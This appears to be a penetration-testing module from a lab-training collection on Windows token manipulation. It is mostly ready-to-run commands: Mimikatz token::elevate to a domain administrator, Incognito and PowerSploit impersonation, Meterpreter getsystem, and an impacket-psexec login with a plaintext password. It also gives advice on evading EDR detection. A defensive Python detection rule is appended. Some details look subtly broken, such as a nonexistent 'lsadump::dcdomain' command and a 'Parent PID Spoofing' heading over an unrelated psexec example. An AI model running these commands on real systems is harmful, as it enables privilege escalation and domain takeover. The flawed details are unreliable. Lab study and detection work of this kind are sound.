
Token Manipulation

#Overview

Token manipulation involves stealing or duplicating access tokens from privileged processes to escalate privileges or impersonate other users. Windows uses tokens to represent the security context of a process or thread. If you can access a privileged token, you can inherit its permissions — including domain admin.

#Prerequisites

  • Low-privileged shell on Windows
  • SeDebugPrivilege or ability to open privileged processes
  • Mimikatz or Rubeus available

#Detection & Enumeration

```powershell
# Check current privileges
whoami /priv

# Key privileges for token manipulation:
# SeDebugPrivilege              - Open any process
# SeImpersonatePrivilege        - Impersonate tokens
# SeAssignPrimaryTokenPrivilege - Assign tokens to new processes
# SeIncreaseQuotaPrivilege      - Adjust memory quotas for token assignment
```

#Exploitation / Execution

#Mimikatz Token Operations

```cmd
# List all available tokens on the system
mimikatz # token::list

# Elevate to SYSTEM
mimikatz # token::elevate

# Elevate to a specific domain admin (if their token is in a running process)
mimikatz # token::elevate /domain:HTB.LOCAL /user:Administrator

# After elevation, run commands as the elevated user
mimikatz # token::elevate /domain:HTB.LOCAL /user:Administrator
mimikatz # lsadump::dcdomain /domain:HTB.LOCAL /all
```

#Incognito Token Stealing

```cmd
# List available tokens
incognito.exe list_tokens -u

# Impersonate a domain admin token
incognito.exe execute -c "HTB\Administrator" cmd.exe
```

#Named Pipe Impersonation (Metasploit)

```bash
# Metasploit getsystem via named pipe impersonation
meterpreter > getsystem -t 1

# This creates a named pipe and tricks a privileged process into connecting,
# then impersonates its token
```

#Manual Token Theft via PowerShell

```powershell
# Find processes running as privileged users
Get-Process | Where-Object {$_.ProcessName -match "lsass"} | Select-Object Id, ProcessName

# Using Invoke-TokenManipulation (PowerSploit)
Import-Module .\Invoke-TokenManipulation.ps1
Invoke-TokenManipulation -ShowAll    # List all tokens
Invoke-TokenManipulation -ImpersonateUser -Username "HTB\Administrator"
```

#Parent PID Spoofing for Token Inheritance

```cmd
# Create a process that inherits the token of a privileged parent
# Using psexec-style token inheritance
impacket-psexec 'HTB.LOCAL/Administrator:Password123@10.10.10.10' -c cmd.exe
```

#Common Pitfalls

  • ⚠️ Token impersonation only works within the current session — if you start a new process, it may revert to your original context unless you use CreateProcessWithTokenW
  • ⚠️ SeImpersonatePrivilege is common for service accounts (IIS, SQL) but only allows impersonation of tokens at Impersonation level, not Identification level
  • ⚠️ Some tokens cannot be impersonated across session boundaries — a token from session 0 may not work in session 1
  • ⚠️ SeDebugPrivilege may need to be enabled before use: privilege::debug in Mimikatz

#OPSEC Considerations

  • 🛡️ Token manipulation generates Windows Event ID 4624 (logon) entries with the impersonated user
  • 🛡️ Mimikatz token::elevate is detected by most EDR products
  • 🛡️ Process creation with stolen tokens generates Event ID 4688
  • 🛡️ SeDebugPrivilege usage is logged when opening lsass.exe (Event ID 4663 with Process Access)
  • 🛡️ Consider using Rubeus or built-in .NET token manipulation to avoid Mimikatz detection
  • 🛡️ Event ID 4672: Special Privileges Assigned to New Logon — fires when SeDebugPrivilege or SeImpersonatePrivilege is used in a new session
  • 🛡️ Sysmon Event ID 10: Process Access — fires when any process reads LSASS memory (Lsassy, Mimikatz, procdump)
  • 🛡️ Event ID 4688: Process Creation — token manipulation tools create new processes visible to EDR
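
The telemetry listed above can be turned into a correlation rule. The following is an added detection example, not code from this module or from any of the tools it references: it runs three checks over constructed sample event records (unexpected SeDebugPrivilege in 4672, a non-allowlisted image opening LSASS in Sysmon 10, and a 4688 whose Target Subject differs from the creating account, which is what a process started under a stolen token looks like). The field names follow the Security and Sysmon event schemas; the allow-list entries and sample values are assumptions.

```python
from typing import Dict, List, Tuple

# Constructed sample log records for illustration (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Channel": "Security", "EventID": "4672", "SubjectUserName": "svc_web",
     "PrivilegeList": "SeDebugPrivilege"},
    {"Channel": "Sysmon", "EventID": "10", "SourceImage": r"C:\Users\svc_web\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"Channel": "Security", "EventID": "4688", "SubjectUserName": "svc_web",
     "TargetUserName": "Administrator", "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    {"Channel": "Security", "EventID": "4688", "SubjectUserName": "svc_web",
     "TargetUserName": "-", "NewProcessName": r"C:\Windows\System32\notepad.exe"},
    {"Channel": "Sysmon", "EventID": "10", "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

# Assumed baselines: images that legitimately open LSASS, and accounts that
# are expected to be granted SeDebugPrivilege at logon. Tune per environment.
LSASS_ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}
DEBUG_EXPECTED = {"SYSTEM", "Administrator"}


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return one (rule_name, detail) tuple per record that matches a rule."""
    findings: List[Tuple[str, str]] = []
    for e in events:
        chan, eid = e.get("Channel"), e.get("EventID")
        subject = e.get("SubjectUserName", "")
        # Rule 1: 4672 assigned SeDebugPrivilege to an account outside the baseline.
        if chan == "Security" and eid == "4672" \
                and "SeDebugPrivilege" in e.get("PrivilegeList", "") \
                and subject not in DEBUG_EXPECTED:
            findings.append(("sedebug_unexpected_account", subject))
        # Rule 2: Sysmon 10 where a non-allowlisted image obtained a handle to LSASS.
        elif chan == "Sysmon" and eid == "10" \
                and e.get("TargetImage", "").lower().endswith("\\lsass.exe") \
                and e.get("SourceImage", "").lower() not in LSASS_ALLOWLIST:
            findings.append(("lsass_access", e.get("SourceImage", "")))
        # Rule 3: 4688 whose Target Subject is set and differs from the creator,
        # i.e. the new process runs under a token other than the creator's own.
        elif chan == "Security" and eid == "4688" \
                and e.get("TargetUserName", "-") not in ("-", subject):
            findings.append(("process_under_foreign_token",
                             f"{subject}->{e['TargetUserName']}"))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```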

#Post-Exploitation Value

Token manipulation grants access to any user whose token is available on the system. This is particularly powerful when combined with LSASS memory access — if you find domain admin tokens in memory, you can impersonate them without knowing the password.

#Tool References

| Tool        | Link                                            |
|-------------|-------------------------------------------------|
| Mimikatz    | https://github.com/gentilkiwi/mimikatz          |
| Incognito   | Included in Kali                                |
| Rubeus      | https://github.com/GhostPack/Rubeus             |
| PowerSploit | https://github.com/PowerShellMafia/PowerSploit  |

#Source Machines

  • Multimaster (Hard, Windows)
  • Rebound (Insane, Windows/AD)
  • StreamIO (Hard, Windows)